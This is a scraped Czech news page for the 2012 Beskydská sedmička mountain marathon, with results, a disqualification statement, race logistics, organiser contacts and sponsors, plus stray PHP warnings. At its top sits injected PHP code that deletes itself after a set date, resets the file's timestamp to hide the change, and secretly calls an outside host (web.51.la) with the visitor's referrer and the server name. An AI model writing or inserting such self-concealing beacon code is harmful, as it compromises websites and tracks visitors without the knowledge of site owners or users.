check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735874){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } ADIDAS TERREX - CONTINENTAL BESKYDSKÁ SEDMIČKA - AKTUALITY
           
www.continental.cz
M ČR V HORSKÉM MARATONU DVOJIC
EXTRÉMNÍ PŘECHOD BESKYD - JAVOROVÝ - JAVORNÍK 2012
HLAVNÍ STRÁNKAVÝSLEDKOVÁ LISTINAINFO ZE ZÁVODUMÉDIA / PRESSFOTOGALERIE

VÍTĚZNÉ TÝMY MČR

1.MÍSTO
194 - SALOMON-RUN
PETREČEK TOMÁŠ
ŠTRYNCL PAVEL

ČAS VÍTĚZE: 13:05:04

2.MÍSTO
117 - SLS3-SKVK
CYPRA ZBYNĚK
VABROUŠEK PETR
ČAS: 13:13:31

3.MÍSTO
253 - L4L5S1
POLÁK VLADIMÍR
NAHORNIAK TOMÁŠ
ČAS: 13:51:24 

UPOUTÁVKY 2012

BESKYDSKÁ SEDMIČKA - 2012


REGISTRACE B7 - 2012


INLINE 24 - 2012


LH 24 - 2012

KONTAKT NA ORGANIZAČNÍ TEAM:
Pořadatel akce SK K2 o.s., Libor Uher
Česká asociace extrémních
sportů - ČAES

Vedení závodu
Libor Uher
+420 608 228 227
libor@beskydskasedmicka.cz

Jana Matějíková
presscentrum
+420 602 936 634
info@beskydskasedmicka.cz


MUDr. Radomír Maráček
organizační tým B7, doprava, lékař
rm@beskydskasedmicka.cz


Registrace závodu

Kateřina Uhrová
+420 603 228 228
registrace@beskydska
sedmicka.cz


Marian Žárský
kulturní program Frenštát
marian@beskydskasedmicka.cz


Martina Filipová

organizační tým B7
martina@beskydskasedmicka.cz


Tomáš Janeček

grafika, web, technik
+420 777 712 747
tomas@beskydskasedmicka.cz


Iveta Nakoukalová

dobrovolníci, akreditace
iveta@beskydskasedmicka.cz


Mirek Prašivka

všechno ostatní :-)

Tomáš Zatloukal
doprava pořadatelů

Petr Kalina
značení a úklid trati

Dušan Klimek
technické zajištění FrenštátADIDAS TERREX - CONTINENTAL BESKYDSKÁ SEDMIČKA - AKTUALITY
PRODEJ KALENDÁŘE DHAULAGIRI 2012

Prodej kalendáře z expedice Dhaulagiri 2012, kterou absolvoval Libor Uher spolu s Tomášem Petrečkem, Markem Novotným a Petrem Maškem si od dnešního dne můžete zakoupit v e-shopu Beskydské sedmičky. Formát kalendáře je A2 (594x420 mm) a krom fotek si můžete přečíst i vyprávění a zážitky z expedice.

Odkaz na e-shop zde


kalend bez_psu strana 1_tisk_12_11_2012

strana 6_tisk_12_11_2012 strana 11_tisk_12_11_2012

 
EXTRÉMNÍ ZÁVOD B7 JE EXTRÉNĚ ČISTOU AKCÍ

Letošní eXtrémní závod Adidas Terrex - Continental Beskydská sedmička zabodovala v soutěži Čistý festival, která motivuje účastníky, návštěvníky a pořadatele masových akcí k tomu, aby třídili odpad, udržovali místa konání akcí čisté a co nejméně tak zatěžovali životní prostředí. Beskydské sedmičce se to podařilo, v soutěži Čistý festival jí patří 2. místo. 

Celý článek...
 
FILM O PRVNÍM ROČNÍKU LH24 - ADIDAS 24 HODIN NA LYSÉ HOŘE

NECHÁTE SE INSPIROVAT? :-)

 
VÝSLEDEK SBÍRKY KAŽDÝ METR POMÁHÁ

 dsc0331Veřejná sbírka „Každý metr pomáhá“ proběhla ve dnech 7. 9. – 17. 9. 2012 v rámci sportovní akce Adidas Terex – Continental Beskydská sedmička 2012 na Náměstí Míru ve Frenštátě pod Radhoštěm.

Účel sbírky „Každý metr pomáhá“: pomoc konkrétním dětem s těžkým zdravotním postižením, které jsou ze zdravotních a sociálních důvodů umístěny v Dětském centru Strančice (dříve dětský domov), ul. Hrdinů 175. Těmto dětem bude z výtěžku veřejné sbírky, v rámci terénních programů sdružení ŠAFRÁN dětem o.s., poskytnuta podpora na výrobu speciálních terapeutických pomůcek, polohovacích hadů a terénních služeb.

Celý článek...
 
DISKVALIFIKACE TÝMU 99 A 414 - OFICIÁLNÍ VYJÁDŘENÍ

Vážení účastníci závodu Beskydské Sedmičky, pořadatelé, diváci a čtenáři,

předem se Vám chceme za sebe i celý organizační tým omluvit, že musíte číst a poslouchat informace o tom, jak jsme se zachovali nefér k týmům, které doběhly na třetí a čtvrté pozici v kategorii SPORT. Vrhá to špatné světlo na celý závod a znehodnocuje tak nejen naši několika měsíční intenzivní práci, čas a energii, kterou jsme závodu věnovali, ale hlavně to vrhá špatné světlo na skvělé výkony všech účastníků závodu, bez ohledu na to zda došli do cíle nebo ne.

Považujeme tedy za naší povinnost zveřejnit zde informace, které jednou pro vždy ukončí tyto debaty a diskuze, do kterých přispívají většinou ti, kteří v danou chvíli na náměstí nebyli a mají zkreslené informace a tím se šíří spekulace o tom, co se vlastně stalo.

Celý článek...
 
B7 DISKVALIFIKOVALA ZÁVODNÍKY Z 3. MÍSTA

Adidas-Terrex – Continental Beskydská sedmička je závod fair-play, který má vymezená pravidla. Z důvodu nesportovního chování byl diskvalifikován tým z kategorie Sport na třetím místě a dalších 20 týmů za nedodržení pravidel.

Celou trasu závodu se týmy Czech Adidas Terrex Ostravice ve složení Daniel Šilar a Pavel Blabla a Salomon-Suunto/lokalblok s Janem Kotykem a Tomášem Rybářem vzájemně doháněly a hecovaly ve výkonech. Cestou se ale dohodly, že do cíle dojdou společně a o třetí místo se rozdělí. To je ale nepřípustné. Shodla se na tom jury závodu. Domlouvat se kdo a jak dojde do cíle a rozdělovat si předem medailové pozice je za hranicí fair play, je to znehodnocení závodu. Nestandartní situaci vyřešila jury jediným možným a správným verdiktem, a to tak, že zmiňované týmy byly nekompromisně diskvalifikovány nejen ve své kategorii, ale i v celém absolutním pořadí v závodě.

Na třetím místě v kategorii SPORT je tedy tým L4L5S1 Nový Jičín s časem 13:51:24 hodin.

Celý článek...
 
Beskydskou sedmičku vyhrál Tomáš Petreček a Pavel Štryncl

Mistry České republiky v extrémním horském maratonu Adidas Terrex-Continental Beskydská sedmička 2012 se v 11:42:05 hodin stali Tomáš Petreček a Pavel Štryncl z týmu Salomon-run ze Slavkova. Trasu z Javorového na Javorník dlouhou 95 km s převýšením 5430 m zdolali za 13:05:04 hodin. Radost ze zaslouženého vítězství v tu chvíli přemohla všechnu bolest a únavu. Na pomyslnou Ká-dvojku v cíli závodu vystoupal tento tým bez zaváhání jako jeden muž.

Celý článek...
 
Pro vítězství si jde první tým

Závodu stále kraluje Salomon-run Slavkov ve složení Petreček Tomáš a Štryncl Pavel, kteří jako první sestupují z Javorníku do Frenštátu. V cíli by mohli být zhruba za půl hodiny.

 
On-line zveřejňování výsledků

V diskuzi se objevují příspěvky o tom, že informace o průběžných výsledcích jsou velmi strohé. Vycházíme z ověřených výsledků elektronických bran a výsledky jsou aktualizovány na hlavní webové stránce beskydské sedmičky vlevo nahoře tedy ZDE

 
Průběžné výsledky - Ráztoka

Sport

Na Ráztoce už je Salomon-run ze Slavkova (10:06 hodin),v závěsu je SLS3-SKVK z Vizovic (10:28), třetí je Salomon-Suunto/lokalblok z Červených Peček (10:35 hodin).

Hobby

BejkTeam-Šternberk (10:16 hodin).

 

 
Průběžné výsledky - Lysá hora

V kategorii sport byl na vrcholu nejrychleji tým Survival z Jílové u Prahy v čase 5:19 hodin, za nimi je Salamon-run ze Slavkova v čase 5:24 hodin. Jako třetí z kategorie sport na Lysou horu došli X-AIRáci z Ostravy – Poruby v čase 5:33 hodin.

Prvenství v kategorii Sport - ženy si zatím drží Sestry Juráčkovy z Pardubic, z vrcholu Lysé hory se podívaly za 5:57 hodin, za nimi je Czech Adidas Terrex W z Frenštátu s časem 7:11 hodin a třetí jsou Jaglamaghor z Prahy s časem 1:51 hodin.

V kategorii hobby si nejlépe vedli Aktivisti ze Zlína s časem 9:31 hodin, na paty jim šlapou Naklepaní řízci z Paskova – 9:34 hodin, třetí je Pražská dvojka z Prahy s časem 9:43 hodin.

Mezi ženami jsou nejlepší Běhny z Říčan, které na Lysou horu vyběhly za 6:55 hodin. Druhé jsou Mission impossible ze Staré L’ubovně s časem 7:01 hodin a třetí jsou Větrem ošlehané gumáky z Ostravy se svým časem 7:04 hodin.

Kategorie Hobby - mix: nejrychleji byli na Lysé hoře Aktivisti ze Zlína s časem 9:31 hodin, za nimi Pražská dvojka – 9:43 hodin a Sběratelé puchýřů v čase 9:53 hodin.

 

 

 
Libor Uher skončil

Leader závodu Beskydská sedmička Libor Uher musel závod ukončit. Důvodem bylo zranění jeho parťáka Rosti Filipce, který špatně našlápl a pohmoždil si kotník. V cestě za vítězstvím nemohl dále pokračovat. Pravidla zní jasně, týmy přihlášené do závodu musí dojít do cíle kompletní.

Libor Uher a Rostislav Filipec odstoupili po 6. hodině ranní, kdy se pohybovali poblíž Čeladenky.

Před osmou hodinou jsme od 38 týmů přijali SMS o odstoupení ze závodu.

 

 

 
Ze závodu už dobrovolně odstoupilo 31 týmů

Je sobota 6 hodin ráno, ze závodu se odhlásilo 31 týmů. Důvodem bylo ve většině případů vyčerpání a dehydratace organismu. Další týmy nestihly ve stanoveném limitu projít časovou bránou.

Celý článek...
 
Beskydská sedmička odstartovala

Adidas Terrex – Continental Beskydská sedmička 2012 odstartovala ve 22:36 hodin z náměstí Svobody v Třinci. Tři tisíce lidí se vydalo na extrémní přechod Beskyd. Všichni byli odhodláni vydat ze sebe co nejvíc a dojít co nejdál.

Celý článek...
 
INFO 3 - POKYNY PŘED STARTEM - ČASTÉ DOTAZY

AKREDITACE ZÁVODNÍKŮ proběhne 7.9.2012 od 12:00 do 21:00 hod (musí být přítomni všichni členové týmu)

ODJEZD VLAKŮ Z FRENŠTÁTU DO TŘINCE
VLAK ADIDAS - 19:09 hod (trasa  Frenštát - Frýdek - Místek - Dobrá - Český Těšín)
VLAK CONTINENTAL - 19:19 hod (trasa Frenštát - Frýdek - Místek - Kunčice - Havířov - Český Těšín)
SPOJENÝ VLAK - příjezd do Třince 21:06 hod (trasa Český Těšín - Třinec)

ÚČASTNÍCI, KTEŘÍ POJEDOU VLAKEM, BY MĚLI BÝT AKREDITOVÁNÍ DO ZÁVODU NEJPOZDĚJI DO 18:30 hod, kdy je plánovaný společný odchod z náměstí ve Frenštátu. Nenechávejte akreditaci na poslední chvíli.

JÍZDA VLAKEM NENÍ POVINNÁ

V TŘINCI SE VYSTUPUJE Z VLAKU VLEVO, VE SMĚRU JÍZDY. POKRAČUJE SE DÁLE VE SMĚRU JÍZDY (SMĚR DO TŘINCE)
DBEJTE POKYNŮ POŘADATELŮ A MĚSTSKÉ POLICIE TŘINEC!
PROVOZ NA PŘILEHLÝCH KOMUNIKACÍCH NEBUDE ZASTAVEN!

PO SLAVNOSTNÍM ZAHÁJENÍ NA NÁMĚSTÍ SVOBODY V 22:30 hod
bude  přesun k lesoparku v Třinci opět řízen městskou policií a pořadateli.

Za lesoparkem trasa závodu překračuje hlavní komunikaci I/11. Zde bude provoz vozidel zastaven vždy na dobu 20 minut. Poté budete pořadateli zastaveni. Policie uvolní provoz na silnici a znovu uzavře po uvolnění komunikace od vozidel.

PROSÍME TÍMTO VŠECHNY ZÁVODNÍKY O MAXIMÁLNÍ SPOLUPRÁCI. Nemáme jinou možnost jak překročit I/11, která je hlavním koridorem pro dopravu na Slovensko a Polsko.

Od startu až po vstup do leska vedle lanovky na Javorový povede průvod vozidlo Městské policie.

Ubytování, sprchy a uschovna zavazadel, spacaku, karimatek, náhradního oblečení je jako vždy v ZŠ Tyršova NONSTOP i pro týmy které předčasně skončí v závodě

odvoz pořadatelskými autobusy je až za Lysou horou. (Ostravice, Čeladná, Raztoka)

Důkladná kontrola povinné výbavy bude už před startem. POZOR - Bez kompletni povinné výbavy nebudete vpuštění k akreditaci do Sokolovny

vytištěné, vyplněné a podepsané reverzy sebou

 
INFO 2 - ZDRAVOTNÍ ZABEZPEČENÍ

HORSKÁ SLUŽBA BESKYDY se na Vás připravila a chystá na dobu závodu ADIDAS TERREX - CONTINENTAL BESKYDSKÁ SEDMIČKA posílení normálního provozu o 10 dobrovolných členů. Navíc v pohotovosti budou 3 terénní vozy a 2 čtyřkolky s profesionálními členy HORSKÉ SLUŽBY. O zdravotní zabezpečení se budou stejně jako loni starat "žluté" vozy Záchranné služby Moravskoslezského kraje se stanovišti:

Ostravice – základní škola v sobotu 8. 9. 2012 od 14:00 hod do cca 18:00 hod
Čeladná – Čeladenka v sobotu 8. 9. 2012 od 16:00 do 21:00 hod
Ráztoka – Hotel Ráztoka od cca 18:00 hod do 24:00 hod.

To vše bude doplňovat 5 pořadatelských vozů.

 
INFO 1 - OBČERSTVOVAČKY A NUTREND

V každém údolí u checkpointu mimo sedlo Pindula (bez občerstvení B7) bude možnost se občerstvit a nabrat si vodu. První stanice pro trasu SPORT v Řece bude mít pouze pitnou vodu. Zde nebude obsluha, pouze pořadatel, který má na starosti elektronické měření a koberec. Zde půjde pouze cca 900 závodníků v MČR a netýká se většiny startovního pole v Hobby !

První velká stanice s vodou, iontovým nápojem Nutrend, ovocem, sladkostmi a solí bude až na Morávce (Autoklub Hotel Morávka- Rybářská Bašta). Zde je i první cvakací kontrola do vašich závodnických karet. Vrcholy Velký Javorový a Ropice jsou rovněž opatřeny průchozími kontrolními koberci. Proud závodníku bude v těchto místech tak veliký, že bychom neměli šanci pořadatelsky zvládnout plynule orážet vaše karty, pořadatelé budou pouze dohlížet, aby každý závodník prošel měřícím zařízením. Cesta je tam široká, v podstatě dva luxusní pruhy od kolejí traktoru :-))))

Celý článek...
 
HARMONOGRAM ZÁVODU 2012

Zdravíme všechny účastníky závodu ADIDAS TERREX - CONTINETAL BESKYDSKÁ SEDMIČKA 2012

na stránkách závodu jsme v levém sloupci pověsili informace týkající se harmonogramu závodního víkendu 7.9. - 9.9.2012

Moc děkujeme za Vaše telefonáty a smsky, připomínky a náměty. Vše postupně připravujeme a zveřejňujeme. Jen prosíme o trochu trpělivosti. Stejně jako u Vás i v týmu B7 stoupá tlak :-) a snažíme se vyřešit a zveřejňovat všechny věci v co nejkratších termínech.

K tomuto účelu budou zasílány účastníkům B7 pravidelné mailingy s novými informacemi či upozorněním vyvěšení nových věcí na webu.

HODNĚ ŠTĚSTÍ V ZÁVĚREČNÉM TRÉNINKU NA B7 :-)

Harmonogram je i zde po rozklinutí článku.

Celý článek...
 
MAPY A INFORMACE K TRATI

vyskovy profil_b7_2012Ahoj sportovci.

Jak jste si jistě všimli, zveřejnili jsme na webu oficiální trasu letošního závodu Adidas Terrex - Continental Beskydské sedmičky. Když jsme to vyklikavali do Google Earth , čekali jsme k jakým číslům se dostaneme. Z některých čísel jsme byli celkem překvapení.

Celý článek...
 
HLAVNÍ CENA PRO VÍTĚZE M ČR V HORSKÉM MARATONU DVOJIC

S RADOSTÍ MŮŽEME OFICIÁLNĚ OZNÁMIT, ŽE FIRMA EQUINOX SE STALA VÝZNAMNÝM PARTNEREM ADIDAS TERREX - CONTINENTAL BESKYDSKÉ SEDMIČKY 2012.

Equinox je opravdovým výrobcem luxusních karbonových zapletených kol (karbonových výpletů) pro silniční cyklistiku i horská kola a obouvá je nejen Libor Uher, ale i celá řada špičkových profesionálních cyklistů.

VÍTĚZNÉMU TÝMU V ABSOLUTNÍM POŘADÍ - TEDY MISTRŮM ČESKÉ REPUBLIKY V HORSKÉM MARATONU DVOJIC - věnuje firma EQUINOX DVA PÁRY (DVA SETY) KARBONOVÝCH VÝPLETŮ BALANCE RT 33 (v hodnotě 27990,- Kč za set)    

Informace o typu BALANCE RT 33 ZDE - více na www.equinox-bikes.eu 

PROMO VIDEO FIRMY EQUINOX

 

Warning: Illegal string offset 'active' in D:\Inetpub\webs\2036_web\www\history\templates\b7_2012\html\pagination.php on line 90

Warning: Illegal string offset 'active' in D:\Inetpub\webs\2036_web\www\history\templates\b7_2012\html\pagination.php on line 96

Warning: Illegal string offset 'active' in D:\Inetpub\webs\2036_web\www\history\templates\b7_2012\html\pagination.php on line 90

Warning: Illegal string offset 'active' in D:\Inetpub\webs\2036_web\www\history\templates\b7_2012\html\pagination.php on line 96
«ZačátekPředchozí12DalšíKonec»

Strana 1 z 2

GENERÁLNÍ PARTNEŘI

adidas


1511


PARTNEŘI

IBS    
Frenštát pod Radhoštěm


www.rajpneu.czAuthor
I style

 

black


Nutrend

radegast


 
  

black


 


 

Suunto


 

 Frýdek-Místek     Obec Ostravice

 

       

  

Opavanet

 

Sportovní medicína

 
 

Mapy Shokart

 

Author
In agency    Škola - Frenštát pod Radhoštěm SK Valašské království


KLUB ČESKÝCH TURISTŮ


 

CAES


CAES

CAES